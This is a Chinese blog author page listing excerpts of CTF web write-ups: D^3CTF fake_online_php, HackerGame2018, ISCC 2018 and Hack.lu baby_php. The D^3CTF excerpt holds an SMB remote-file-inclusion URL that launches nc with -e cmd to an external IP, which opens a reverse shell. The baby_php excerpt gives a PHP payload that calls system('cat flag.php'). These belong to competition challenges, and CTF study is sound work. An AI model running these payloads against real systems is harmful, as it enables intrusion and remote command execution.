![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
wp
Smity(Liu)
这个作者很懒,什么都没留下…
展开
-
2019 D^3CTF_wp:fakeonlinephp解法(类实网渗透)
D3ctf fake_online_php 题解外网渗透部分smb协议利用导致远程文件包含http://35547429ed.fakeonelinephp.d3ctf.io/?orange=\**********\share\test5&a=…\nc2.exe±e+cmd+39.105.136.196+30023内网渗透部分再写一个马子进入远程桌面...原创 2019-11-26 09:55:16 · 3485 阅读 · 0 评论 -
中科大HackerGame2018 web题目 writeup
虽然很坑,但是总体来说这次还是做了很多有意思的web题,这里也只给出web题的答案一:签到题打开发现是要输入key值提交但是输入后发现限制了长度,只允许输入到hackergame201打开burp,截包,改包,发送得到flag二:Word文档打开题目链接发现是下载了一个officeopenXML.docx的文件上网查阅发现这个是早期word推出的一种文件格式,其实可以改成zi...原创 2018-10-26 00:14:59 · 2376 阅读 · 0 评论 -
iscc_2018 web题解
一切都是套路开头比较客气,试了.bak .swp .svn都没有出来,结果发现是.txt,还是自己想复杂了典型的变量覆盖漏洞,不用想了,直接先将flag的值赋给flag的值赋给flag的值赋给_200变量,然后利用die($_200)将flag打印出来。你能绕过吗id那里是只允许输入int吧我估计。。。什么十六进制或者其他的字母都认不出来,可能我水平不够想不到其他注入了。我...原创 2018-10-25 23:26:19 · 2231 阅读 · 0 评论 -
Hacklu baby_php wp
Baby_php这题就是各种php黑魔法的集合,先上payload/?msg=php://input&key1=1337&key2=000000000000000000000000000000000001337$&cc[]=&k1=2&bb=system(‘cat flag.php’);//Post数据加上Hello Challenge!介绍几个Ph...原创 2018-10-26 00:15:07 · 353 阅读 · 0 评论